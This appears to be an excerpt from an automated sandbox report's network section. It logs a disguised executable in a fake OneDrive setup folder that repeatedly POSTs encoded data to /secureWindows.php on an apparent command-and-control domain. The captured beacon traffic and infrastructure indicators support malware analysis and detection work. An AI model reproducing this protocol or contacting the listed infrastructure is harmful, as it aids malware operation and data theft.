                                                        Data Raw: 39 38 0d 0a 01 1f 26 1d 3f 38 34 13 26 23 22 5d 28 12 3d 1d 29 00 26 14 25 22 3c 5d 25 12 00 1d 28 38 28 06 3e 24 0a 5b 3f 0b 38 12 34 0f 23 02 29 01 2f 46 0c 10 24 03 27 22 2b 53 3f 0d 2a 03 3d 38 01 59 23 20 31 04 2a 17 05 56 22 55 23 01 26 32 3d 0e 2c 3d 0b 0f 2d 0b 36 5f 2d 23 06 11 29 3a 21 57 08 14 22 10 32 02 3c 07 32 04 33 05 31 0c 2e 5b 34 06 33 5c 36 3b 3d 02 3f 05 38 1c 26 56 3b 07 30 33 33 1c 25 5f 33 02 3e 31 27 56 32 19 22 52 2e 0d 20 56 03 32 58 53 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 98&?84&#"](=)&%"<]%(8(>$[?84#)/F$'"+S?*=8Y# 1*V"U#&2=,=-6_-#):!W"2<231.[43\6;=?8&V;033%_3>1'V2"R. V2XS0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        8 | 192.168.2.4 | 49738 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:13.974978924 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:14.323700905 CET | 1076 | OUT | Data Raw: 57 51 59 55 55 5e 56 50 58 57 50 59 55 5d 5b 59 54 5a 5c 54 59 55 5a 55 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WQYUU^VPXWPYU][YTZ\TYUZU]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&,2](>Y'[':& _$>8; %*7]?%>';&: F$,Z*1
                                                        Oct 30, 2024 05:22:14.581960917 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:14.911711931 CET | 788 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:14 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eVT5KYb%2F6u9Fv%2FMXQDID9Wb0pW6NxwWZ43kwLaDeHVLyX6yAD3B6zqYvc%2Btd30cZkUFyaMyOlE7btGp%2BUIXxLBxaY89pbru3sslJfTohurmMgyAV1TEGJD3YpOEWMtXwFmTVRYaQfmU%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89f84cb9d281b-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1537&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1064705&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        9 | 192.168.2.4 | 49740 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:15.049412012 CET | 286 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:22:15.401842117 CET | 1076 | OUT | Data Raw: 52 53 5c 51 50 5a 56 51 58 57 50 59 55 51 5b 5e 54 5a 5c 5b 59 53 5a 5c 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RS\QPZVQXWPYUQ[^TZ\[YSZ\]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&- <$-/:C0\1.?,\+":10?C!['("/* F$,Z*
                                                        Oct 30, 2024 05:22:15.674638987 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:15.997582912 CET | 788 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:15 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0MHcCXtXgDOUEZs%2Babu3DiQGvPMJR5SvYtXzRJM00uoW54QLk6CG8gbBJ0jMT%2F2cYgv9zB5qkP0MhegXYnNXkZToTjFc8cTqMv5x4qMtQqzKYDpM9FxFaznS80kKf82y6rb7tJ6E%2B%2BY%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89f8b9a65e926-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1066&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1394990&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        10 | 192.168.2.4 | 49742 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:16.125663042 CET | 286 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:22:16.479959011 CET | 1076 | OUT | Data Raw: 57 55 5c 53 50 5d 56 50 58 57 50 59 55 5d 5b 53 54 5d 5c 5a 59 5c 5a 5e 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WU\SP]VPXWPYU][ST]\ZY\Z^]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%80-<(1'7A:Z%-//:+79$&_+6!\'.. F$,Z*1
                                                        Oct 30, 2024 05:22:16.728323936 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:17.038127899 CET | 784 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:16 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w4hIdFIFkm1Uc81oxpgcGninhH0ShXPA61vZajv8ycIuXBGWJEcQOG5bAK1R3%2Fl4yumGRB0DH4y1pX41qHAv6dniyQASQIjKDhV6gwcXr23E2qb06HPqPIxYt8W8j3z0LAxJ%2BsXmzdY%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89f923c2aeac1-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1013&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1302158&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        11 | 192.168.2.4 | 49745 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:17.172498941 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:17.527048111 CET  1076  OUT  Data Raw: 52 53 5c 54 55 5d 53 52 58 57 50 59 55 5c 5b 58 54 5e 5c 5c 59 57 5a 55 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RS\TU]SRXWPYU\[XT^\\YWZU]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&-31<'#-5 2$Z/; *;X%:7+%53("/* F$,Z*5
                                                        Oct 30, 2024 05:22:17.769099951 CET  25  IN  HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:18.063199043 CET  784  IN  HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:18 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ki8lcahr1WxmHWAB9I1sX3Puu70RhfcpVOort7HSgENDhJrYM3%2FWf383ReWrDHkb2fwy97pTETFLSTeSjm196PE4eVRPvme8ic%2FAWHW4erFaURyUqqEu9nq3JTZpLL3BTHFQoOTxjmg%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89f98bf484790-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1261&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1182040&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                        12  192.168.2.4  49746  188.114.96.3  80  7760  C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp  Bytes transferred  Direction  Data
                                                        Oct 30, 2024 05:22:18.352463961 CET  310  OUT  POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:18.698719025 CET  1076  OUT  Data Raw: 57 5e 5c 57 50 5f 53 51 58 57 50 59 55 5b 5b 5c 54 5e 5c 5d 59 51 5a 5e 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W^\WP_SQXWPYU[[\T^\]YQZ^]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%[-0:]?8!'[+E-571>/-9+7+19'<9Z'(: F$,Z*)
                                                        Oct 30, 2024 05:22:18.950525045 CET  25  IN  HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:19.277766943 CET  789  IN  HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:19 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pAM%2By61PjogznBFjXypGZYN2fJdz7BXaoY4KlYWX2kKZ5CFLHwE5ZzQ13DJMQStdkac4njS3jY7RvRtJEWM02%2BH%2Ftc8MU4hltGtARN7g%2Bh8Fif2FqVs7Z0UAOPM%2BduERenRhXO5UwEw%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89fa01a746be9-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=990&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1476044&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                        13  192.168.2.4  49748  188.114.96.3  80  7760  C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp  Bytes transferred  Direction  Data
                                                        Oct 30, 2024 05:22:19.411257982 CET  310  OUT  POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive


                                                        Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                        14  192.168.2.4  49749  188.114.96.3  80  7760  C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp  Bytes transferred  Direction  Data
                                                        Oct 30, 2024 05:22:19.721645117 CET  310  OUT  POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1340
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:20.073736906 CET  1340  OUT  Data Raw: 57 50 5c 51 55 5c 56 53 58 57 50 59 55 51 5b 5f 54 5a 5c 5b 59 54 5a 5c 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WP\QU\VSXWPYUQ[_TZ\[YTZ\]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%[- *_<Y0. 9/1<_/)4["982)7?!0%[9: F$,Z*
                                                        Oct 30, 2024 05:22:20.354216099 CET  25  IN  HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:20.569827080 CET  938  IN  HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:20 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ohWq%2BmEtAsmheXOhYLbXsJWqOFFl%2BgY1%2F3j1T9cuHt4JLNvvRsPctL%2FbnVVexMpwPSOsyxWMoPbWaDKPWiImYa79r9SItrahFr0pg0ooLmMndugwWDXFtxLkjXMoaeJsr%2Bcj7V5ktVg%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89fa8db884781-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1768&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1650&delivery_rate=834101&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 39 38 0d 0a 01 1f 25 0e 29 38 06 57 26 1d 2e 58 29 2c 2a 00 3e 00 07 07 25 21 2b 04 31 2c 31 03 2a 2b 27 5a 3d 42 34 5e 3c 21 24 1f 23 08 2c 1c 29 11 2f 46 0c 10 27 5b 27 0c 0a 0e 3f 0d 2e 05 3e 28 2c 01 23 1e 29 04 29 2a 2f 51 21 55 27 03 24 57 3a 53 3b 5b 32 52 39 1c 31 06 39 1d 0d 0c 29 10 21 57 08 14 21 01 25 3c 09 5f 31 3e 3c 59 26 0c 3d 01 23 3f 2f 10 22 5d 2e 10 28 38 3c 54 31 30 34 5a 26 20 28 0e 31 07 02 16 3c 57 2c 0f 25 09 22 52 2e 0d 20 56 03 32 58 53 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 98%)8W&.X),*>%!+1,1*+'Z=B4^<!$#,)/F'['?.>(,#))*/Q!U'$W:S;[2R919)!W!%<_1><Y&=#?/"].(8<T104Z& (1<W,%"R. V2XS0


                                                        Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                        15  192.168.2.4  49751  188.114.96.3  80  7760  C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp  Bytes transferred  Direction  Data
                                                        Oct 30, 2024 05:22:19.846756935 CET  310  OUT  POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:20.198719978 CET  1076  OUT  Data Raw: 57 55 59 56 50 5e 53 57 58 57 50 59 55 59 5b 5b 54 52 5c 5d 59 52 5a 5f 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WUYVP^SWXWPYUY[[TR\]YRZ_]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%^,3&]?3[8:&,]$-0^,#<&97\+C*$89X:* F$,Z*!
                                                        Oct 30, 2024 05:22:20.442985058 CET  25  IN  HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:20.755902052 CET  783  IN  HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:20 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yS32MOLGCnAjL3k0DSj7gAcFXUbTjcXIbid9Z3yK5j6pAhwjJBoHVQUctczh3Hgg6lOW%2FJvPYKArcKSEIEXuP4N0UazzhuHMDsHCFPELk67DMqfdJyeszk9oLXxQvj75LX%2BTr6Qf7hI%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89fa96a300c0f-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1383&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1084644&cwnd=66&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                        16  192.168.2.4  49752  188.114.96.3  80  7760  C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp  Bytes transferred  Direction  Data
                                                        Oct 30, 2024 05:22:20.890213966 CET  286  OUT  POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:22:21.245680094 CET  1076  OUT  Data Raw: 57 52 5c 52 55 54 53 57 58 57 50 59 55 5c 5b 5c 54 5f 5c 5c 59 52 5a 5d 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WR\RUTSWXWPYU\[\T_\\YRZ]]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%\,V"\<8)$[;B,60&[,,*4 \4&<(!]$+". F$,Z*5
                                                        Oct 30, 2024 05:22:21.495198965 CET  25  IN  HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:21.807921886 CET  786  IN  HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:21 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NzW4X9qqfIF81FL2mcLW4SEkUecH2ZlU5pC1IJTuLy81h9QqGAXQd%2BF70xrAJxGhChL9hZfsd10oZrq1wdXlMgxbGOD3Hhpo%2Fmls0H2gRWx%2BbkSWIs9o5j2tVhrNS3vgYDQToGDcFC4%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89faffd0b6bac-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1040&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1291703&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                        17  192.168.2.4  49753  188.114.96.3  80  7760  C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp  Bytes transferred  Direction  Data
                                                        Oct 30, 2024 05:22:21.938133001 CET  310  OUT  POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:22.292851925 CET  1076  OUT  Data Raw: 57 50 59 51 50 5e 53 55 58 57 50 59 55 59 5b 5d 54 59 5c 54 59 57 5a 58 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WPYQP^SUXWPYUY[]TY\TYWZX]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%]- &]=;"[3;@:0_$-/+7*7[& +C!'6: F$,Z*!
                                                        Oct 30, 2024 05:22:22.675173998 CET  25  IN  HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:22.845477104 CET  792  IN  HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:22 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aepF8P4hSmYDV2TtM59k6eqJ0nQVnVqfexbR1h%2FT070laabUqwf3Nnck%2BwTtf10DCmS0wAiFkoz8wfTiDdQABc%2FSA2qedc1JcdAnAw9sex0%2B4Ob%2FnEybJD%2By3H59zZZDaAwK6mVVj6o%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89fb67c310b86-DFW
                                                        alt-svc: h3=":443"; ma=86400
